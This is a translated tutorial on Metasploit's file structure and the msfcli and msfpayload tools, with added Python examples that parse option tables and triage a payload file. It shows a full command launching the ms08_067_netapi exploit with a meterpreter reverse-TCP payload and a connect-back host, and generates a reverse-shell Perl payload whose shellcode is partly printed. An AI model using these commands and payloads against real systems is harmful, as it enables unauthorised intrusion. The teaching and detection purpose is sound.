Analysis of Metasploit's module structure and functions

Published: 2018-11-28 12:00


Author: Xysoul    Source: CSDN

There are plenty of books on the market that introduce Metasploit, and articles on how to use it are everywhere online, yet none of them describes Metasploit's directory structure and what each part does. This article walks through Metasploit's file structure and the function and parameters of each part.
   exploit@ubuntu:/pentest/framework3$ ls
  CONTRIBUTING.md README.md data metasploit-framework-db.gemspec msfconsole msfrop putty.exe
  COPYING Rakefile db metasploit-framework-full.gemspec msfd msfrpc script
  Gemfile a.exe documentation metasploit-framework-pcap.gemspec msfelfscan msfrpcd scripts
  Gemfile.local.example app external metasploit-framework.gemspec msfencode msfupdate spec
  Gemfile.lock av.exe features modules msfmachscan msfvenom test
  HACKING back.pl lib msfbinscan msfpayload payload.exe tools
  LICENSE config log msfcli msfpescan plugins
From the listing above we can see the basic file structure of Metasploit:
config -- Metasploit's environment configuration and database configuration
data -- tools and payloads used by post-exploitation modules, a collection of third-party utilities, user wordlists and other data
db -- database information used when Rails builds msf's web framework
documentation -- user documentation and developer documentation
external -- some of Metasploit's basic extension modules
lib -- Metasploit's core classes and third-party library classes
log -- system and other information recorded while msf runs
modules -- Metasploit's module tree, including auxiliary modules (auxiliary), exploit modules (exploits), attack payloads (payloads), post-exploitation modules (post), as well as NOP modules (nops) and encoder modules (encoders)
msfbinscan -- scans binary files for file offset addresses
msfcli -- Metasploit's command-line mode, which can quickly invoke a working payload for an attack; deprecated in newer versions of Metasploit as of 2015-06-18
msfconsole -- Metasploit's main console, which integrates all of its features.
msfd -- the Metasploit daemon, a non-persistent service
msfelfscan -- scans Linux ELF files for offset addresses
msfencode -- Metasploit's encoder, which encodes msfpayload output and shellcode
msfpayload -- Metasploit's payload generator, used to invoke different payloads and emit shellcode in different formats; deprecated in newer versions of Metasploit as of 2015-06-18 and replaced by msfvenom.
msfmachscan -- same function as msfelfscan, for Mach-O files
msfpescan -- scans Windows PE files for offset addresses
msfrop -- searches Windows PE files by file offset for ROP gadgets, which can be used to bypass ASLR and similar protections
msfrpc -- Metasploit's server side, a non-persistent RPC service
msfrpcd -- a persistent local Metasploit service that offers RPC and other HTTP services to remote users, with data transferred over XML.
msfupdate -- Metasploit's updater, used to update Metasploit's modules
msfvenom -- combines the functions of msfpayload and msfencode, is more efficient, and will replace both
plugins -- interface for Metasploit's third-party plugins
scripts -- Metasploit's commonly used post-exploitation scripts; unlike the post-exploitation modules under data, they need neither the post parameter nor an absolute path and can be run directly
test -- Metasploit's basic test directory
tools -- additional small utilities and third-party script tools
Below we explain how to use these common commands.
msfcli, like msfconsole, is a command-line interface, but it does not offer an interactive mode: it executes straight from the command line and prints the result, invoking auxiliary and exploit modules against the target directly, which is more efficient and convenient.
exploit@ubuntu:/pentest/framework3$ msfcli -h
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
Usage: /usr/local/bin/msfcli <exploit_name> <option=value> [mode]
=================================================================
Mode            Description
----            -----------
(A)dvanced      Show available advanced options for this module       # show the module's advanced options
(AC)tions       Show available actions for this module                # show the module's detailed action options
(C)heck         Run the check routine of the selected module          # run the selected module's check routine
(E)xecute       Execute the selected module                           # execute the selected module
(H)elp          You're looking at it baby!                            # show msfcli's own help
(I)DS Evasion   Show available ids evasion options for this module    # show the module's IDS evasion options
(M)issing       Show empty required options for this module           # show which required options are still unset
(O)ptions       Show available options for this module                # show the available options
(P)ayloads      Show available payloads for this module               # show the payload modules usable with this module
(S)ummary       Show information about this module                    # show detailed information about the module
(T)argets       Show available targets for this exploit module        # show the target types this exploit module supports
Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
Here we explain some of msfcli's specific modes.
The most common usage is to run Metasploit's auxiliary and exploit modules against a target.
Here we display the options of the http_version module to see which settings are available (note that the command passes rhost= while the module's option is named RHOSTS, which is why RHOSTS shows no current setting in the output).
exploit@ubuntu:/pentest/framework3$ msfcli auxiliary/scanner/http/http_version rhost=106.186.118.91 O
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        Use a proxy chain
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    80               yes       The target port
THREADS  1                yes       The number of concurrent threads
VHOST                     no        HTTP server virtual host
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
This shows the payloads that can be used with ms08_067; we can choose one according to our platform and network environment.
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
This shows the advanced properties of ms08_067, which gives better results when exploiting specific versions.
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...
Compatible payloads
===================
Name                                       Description
----                                       -----------
generic/custom                             Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.
generic/debug_trap                         Generate a debug trap in the target process
generic/shell_bind_tcp                     Listen for a connection and spawn a command shell
generic/shell_reverse_tcp                  Connect back to attacker and spawn a command shell
generic/tight_loop                         Generate a tight loop in the target process
windows/dllinject/bind_hidden_ipknock_tcp  Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed" helping us to hide the shellcode
windows/dllinject/bind_hidden_tcp          Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host
windows/dllinject/bind_ipv6_tcp            Inject a DLL via a reflective loader. Listen for a connection over IPv6
windows/dllinject/bind_nonx_tcp            Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp                 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_rc4             Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/reverse_hop_http         Inject a DLL via a reflective loader. Tunnel communication over an HTTP hop point. Note that you must first upload
exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
The M mode shows which required parameters of the module in use have not been set; here we find that the remote server IP still needs to be set.
exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
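Both the O and M modes above print Metasploit's fixed-width tables, and M is just a filter over O: required options whose current setting is empty. The following Python example, added here and not part of the original article or of Metasploit itself, parses that table format by reading the column boundaries from the dashed separator row, so the same parser also handles the Id/Name targets table and the compatible-payloads listing with wrapped descriptions. The sample input is the http_version options table and the first rows of the ms08_067 targets table transcribed from the article's own output; the function names are this example's own.

```python
"""Parse the fixed-width tables that msfcli/msfconsole print (module options,
targets, compatible payloads) and reproduce the M mode: required options that
have no current setting. Added example, not Metasploit code."""
import re
from typing import Dict, List, Optional

# Constructed sample: the http_version options table printed by `msfcli ... O`.
SAMPLE_OPTIONS = """\
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        Use a proxy chain
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    80               yes       The target port
THREADS  1                yes       The number of concurrent threads
VHOST                     no        HTTP server virtual host
"""

# Constructed sample: the first rows of the ms08_067 targets table (`... T`),
# indented the way msfconsole prints it.
SAMPLE_TARGETS = """\
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
"""

# A separator row is runs of dashes separated by whitespace and nothing else.
SEP_RE = re.compile(r"^\s*-{2,}(?:\s+-{2,})*\s*$")


def parse_msf_table(text: str) -> List[Dict[str, str]]:
    """Return one dict per data row, keyed by the header names.

    Column boundaries come from the dashed separator row, so indentation,
    empty cells and descriptions containing spaces are all handled. A row
    whose first cell is empty is a wrapped continuation of the previous
    row's last column (as in the compatible-payloads listing)."""
    lines = text.splitlines()
    sep_idx: Optional[int] = next(
        (i for i, ln in enumerate(lines) if i > 0 and SEP_RE.match(ln)), None)
    if sep_idx is None:
        raise ValueError("no dashed separator row found")
    starts = [m.start() for m in re.finditer(r"-+", lines[sep_idx])]
    bounds = list(zip(starts, starts[1:] + [None]))  # last column runs to end of line
    header = [lines[sep_idx - 1][a:b].strip() for a, b in bounds]
    rows: List[Dict[str, str]] = []
    for line in lines[sep_idx + 1:]:
        if not line.strip():
            break  # a blank line ends the table
        cells = [line[a:b].strip() for a, b in bounds]
        if not cells[0] and rows:
            last = header[-1]
            rows[-1][last] = (rows[-1][last] + " " + cells[-1]).strip()
            continue
        rows.append(dict(zip(header, cells)))
    return rows


def missing_required(rows: List[Dict[str, str]]) -> List[str]:
    """What msfcli's M mode reports: required options with no value set."""
    return [r["Name"] for r in rows
            if r.get("Required", "").lower() == "yes" and not r.get("Current Setting")]


if __name__ == "__main__":
    opts = parse_msf_table(SAMPLE_OPTIONS)
    print("missing required options:", missing_required(opts))
    for t in parse_msf_table(SAMPLE_TARGETS):
        print(t["Id"], t["Name"])
```

Slicing by the separator's dash positions rather than splitting on whitespace is what makes empty cells survive: splitting would silently shift "no" into the Current Setting column for Proxies and report nothing missing.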
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
The E mode executes the currently selected module. In the example above we pick the HTTP service version probe, set its parameters, and append E to run the module.
Another msfcli mode is t, which selects the version of the remote target we are aiming at; as shown below, we can pick the appropriate target for the remote exploit.
   exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi t
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules...
  Id Name
  -- ----
  0 Automatic Targeting
  1 Windows 2000 Universal
  2 Windows XP SP0/SP1 Universal
  3 Windows 2003 SP0 Universal
  4 Windows XP SP2 English (AlwaysOn NX)
  5 Windows XP SP2 English (NX)
  6 Windows XP SP3 English (AlwaysOn NX)
  7 Windows XP SP3 English (NX)
  8 Windows XP SP2 Arabic (NX)
  9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10 Windows XP SP2 Chinese - Simplified (NX)
  11 Windows XP SP2 Chinese - Traditional (NX)
  12 Windows XP SP2 Czech (NX)
  13 Windows XP SP2 Danish (NX)
  14 Windows XP SP2 German (NX)
  15 Windows XP SP2 Greek (NX)
  16 Windows XP SP2 Spanish (NX)
  17 Windows XP SP2 Finnish (NX)
  18 Windows XP SP2 French (NX)
  19 Windows XP SP2 Hebrew (NX)
  20 Windows XP SP2 Hungarian (NX)
  21 Windows XP SP2 Italian (NX)
  22 Windows XP SP2 Japanese (NX)
  23 Windows XP SP2 Korean (NX)
  24 Windows XP SP2 Dutch (NX)
  25 Windows XP SP2 Norwegian (NX)
  26 Windows XP SP2 Polish (NX)
  27 Windows XP SP2 Portuguese - Brazilian (NX)
  28 Windows XP SP2 Portuguese (NX)
  29 Windows XP SP2 Russian (NX)
  30 Windows XP SP2 Swedish (NX)
  31 Windows XP SP2 Turkish (NX)
  32 Windows XP SP3 Arabic (NX)
  33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34 Windows XP SP3 Chinese - Simplified (NX)
  35 Windows XP SP3 Chinese - Traditional (NX)
  36 Windows XP SP3 Czech (NX)
  37 Windows XP SP3 Danish (NX)
  38 Windows XP SP3 German (NX)
  39 Windows XP SP3 Greek (NX)
  40 Windows XP SP3 Spanish (NX)
  41 Windows XP SP3 Finnish (NX)
  42 Windows XP SP3 French (NX)
  43 Windows XP SP3 Hebrew (NX)
  44 Windows XP SP3 Hungarian (NX)
  45 Windows XP SP3 Italian (NX)
  46 Windows XP SP3 Japanese (NX)
  47 Windows XP SP3 Korean (NX)
  48 Windows XP SP3 Dutch (NX)
  49 Windows XP SP3 Norwegian (NX)
  50 Windows XP SP3 Polish (NX)
  51 Windows XP SP3 Portuguese - Brazilian (NX)
  52 Windows XP SP3 Portuguese (NX)
  53 Windows XP SP3 Russian (NX)
  54 Windows XP SP3 Swedish (NX)
  55 Windows XP SP3 Turkish (NX)
  56 Windows 2003 SP1 English (NO NX)
  57 Windows 2003 SP1 English (NX)
  58 Windows 2003 SP1 Japanese (NO NX)
  59 Windows 2003 SP1 Spanish (NO NX)
  60 Windows 2003 SP1 Spanish (NX)
  61 Windows 2003 SP2 English (NO NX)
  62 Windows 2003 SP2 English (NX)
  63 Windows 2003 SP2 German (NO NX)
  64 Windows 2003 SP2 German (NX)
  65 Windows 2003 SP2 Portuguese - Brazilian (NX)
  66 Windows 2003 SP2 Spanish (NO NX)
  67 Windows 2003 SP2 Spanish (NX)
  68 Windows 2003 SP2 Japanese (NO NX)
Based on the above, we attack the target IP remotely with ms08_067_netapi, with the parameters set as follows:
   exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi RHOST=192.168.1.168 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5546 E
  [!] ************************************************************************
  [!] * The utility msfcli is deprecated! *
  [!] * It will be removed on or about 2015-06-18 *
  [!] * Please use msfconsole -r or -x instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
  [!] ************************************************************************
  [*] Initializing modules...
  RHOST => 192.168.1.168
  PAYLOAD => windows/meterpreter/reverse_tcp
  LHOST => 192.168.1.10
  LPORT => 5546
  [-] Handler failed to bind to 192.168.1.10:5546
  [*] Started reverse handler on 0.0.0.0:5546
Next we introduce a tool we use often, msfpayload. Running msfpayload -h shows a help text that looks rather simple, so we explain what each parameter does in detail:
   exploit@ubuntu:/pentest/framework3$ msfpayload -h
  [!] ************************************************************************
  [!] * The utility msfpayload is deprecated! *
  [!] * It will be removed on or about 2015-06-08 *
  [!] * Please use msfvenom instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
  [!] ************************************************************************
Usage: /usr/local/bin/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
  OPTIONS:
  -h Help banner
  -l List available payloads
msfpayload takes the options, the payload module, the variable definitions and the output format. The formats currently supported are: C code, C# code, Perl code, Ruby code, raw byte stream, JS code, exe file, dll file, VBA file, WAR file, apk file and Python file.
For example, to generate a reverse-TCP payload in Perl format, we run the following:
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5546 P > back.pl
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
OK, next we check whether the file was generated and what it contains:
   exploit@ubuntu:/pentest/framework3$ head -n 20 back.pl
  # windows/meterpreter/reverse_tcp - 281 bytes (stage 1)
  # http://www.metasploit.com
  # VERBOSE=false, LHOST=192.168.1.106, LPORT=5546,
  # ReverseConnectRetries=5, ReverseListenerBindPort=0,
  # ReverseAllowProxy=false, ReverseListenerThreaded=false,
  # EnableStageEncoding=false, StageEncoderSaveRegisters=,
  # StageEncodingFallback=true, PrependMigrate=false,
  # EXITFUNC=process, AutoLoadStdapi=true,
  # InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
  # EnableUnicodeEncoding=true
  my $buf =
  "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .
  "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
  "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" .
  "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" .
  "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" .
  "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" .
  "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" .
  "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" .
  "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" .
We can see that back.pl was generated in the current directory. Looking at the Perl file, the connect-back IP address is 192.168.1.106, the connect-back port is 5546, the retry count is 5, encoding is enabled, and below that is the shellcode that performs the connect-back.
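The comment header that msfpayload writes above `$buf` is the most useful part of such a file for whoever has to triage it: it records the payload name, its size and every option, including the connect-back host and port. The following Python example, added here and not taken from the article or from Metasploit, parses that header, decodes the `\xNN` string literal back to bytes, compares the decoded length with the declared 281 bytes, and checks for the six-byte prologue of Metasploit's x86 block_api stub (cld followed by a call into the API-resolver stub) that the buffer above begins with. The sample input is the `head -n 20 back.pl` output shown above, so the length check deliberately reports the blob as incomplete; the function names and the result keys are this example's own.

```python
"""Triage a Perl-format payload file as written by `msfpayload ... P`: recover
the option header, decode the \\xNN literal back to bytes and cross-check the
declared size. Added example, not Metasploit code."""
import hashlib
import re
from typing import Dict, Optional

# Constructed sample: the 20 lines of back.pl shown by `head -n 20` in the
# article, so the $buf literal is deliberately incomplete (126 of 281 bytes).
SAMPLE_BACK_PL = r"""# windows/meterpreter/reverse_tcp - 281 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.1.106, LPORT=5546,
# ReverseConnectRetries=5, ReverseListenerBindPort=0,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# EnableStageEncoding=false, StageEncoderSaveRegisters=,
# StageEncodingFallback=true, PrependMigrate=false,
# EXITFUNC=process, AutoLoadStdapi=true,
# InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
# EnableUnicodeEncoding=true
my $buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" .
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" .
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" .
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" .
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" .
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" .
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" .
"""

HEADER_RE = re.compile(r"^#\s*(?P<payload>\S+)\s+-\s+(?P<size>\d+)\s+bytes")
KV_RE = re.compile(r"(\w+)=([^,\s]*)")       # key=value pairs in the comment lines
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")  # one "\xNN" escape
BUF_RE = re.compile(r"^\s*my\s+\$buf\s*=")

# First six bytes of Metasploit's x86 block_api stub: cld, then a call over
# the API-resolver block. Every windows/*/reverse_tcp stager starts this way,
# which is why many detection rules anchor on it.
MSF_X86_BLOCK_API_PROLOGUE = bytes.fromhex("fce882000000")


def parse_header(text: str) -> Dict[str, object]:
    """Payload name, declared size and every key=value option from the
    leading '#' comment block."""
    payload: Optional[str] = None
    declared: Optional[int] = None
    options: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.startswith("#"):
            break  # the comment header ends at the first code line
        m = HEADER_RE.match(line)
        if m and payload is None:
            payload, declared = m.group("payload"), int(m.group("size"))
            continue
        for key, value in KV_RE.findall(line):
            options[key] = value
    return {"payload": payload, "declared_bytes": declared, "options": options}


def decode_buf(text: str) -> bytes:
    """Decode the \\xNN escapes of the `my $buf = ...` literal into raw bytes."""
    out = bytearray()
    in_buf = False
    for line in text.splitlines():
        if not in_buf:
            if not BUF_RE.match(line):
                continue
            in_buf = True
        out += bytes(int(h, 16) for h in HEX_RE.findall(line))
        if line.rstrip().endswith(";"):
            break  # end of the Perl statement; absent in a truncated file
    return bytes(out)


def triage(text: str) -> Dict[str, object]:
    """Summarise the file: payload, indicators, size check and stub check."""
    meta = parse_header(text)
    blob = decode_buf(text)
    opts = meta["options"]
    lhost, lport = opts.get("LHOST"), opts.get("LPORT")
    return {
        "payload": meta["payload"],
        "declared_bytes": meta["declared_bytes"],
        "actual_bytes": len(blob),
        "complete": meta["declared_bytes"] == len(blob),
        "c2": f"{lhost}:{lport}" if lhost and lport else None,
        "retries": opts.get("ReverseConnectRetries"),
        "exitfunc": opts.get("EXITFUNC"),
        "msf_block_api_prologue": blob.startswith(MSF_X86_BLOCK_API_PROLOGUE),
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BACK_PL).items():
        print(f"{key}: {value}")
```

The header is only as trustworthy as the file that carries it, which is why the decoded length is compared with the declared one and the first bytes are checked independently: a renamed or edited file still yields the connect-back address from the bytes themselves once the length and prologue checks pass.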
This is only a simple example. Likewise, if I don't know which payloads are available, I only need to run:
   exploit@ubuntu:/pentest/framework3$ msfpayload -l
  [!] ************************************************************************
  [!] * The utility msfpayload is deprecated! *
  [!] * It will be removed on or about 2015-06-08 *
  [!] * Please use msfvenom instead *
  [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
  [!] ************************************************************************
  Framework Payloads (356 total)
  ==============================
  Name Description
  ---- -----------
  aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
  aix/ppc/shell_find_port Spawn a shell on an established connection
  aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
  aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
  android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
  android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
  android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
  android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
  android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
  …………
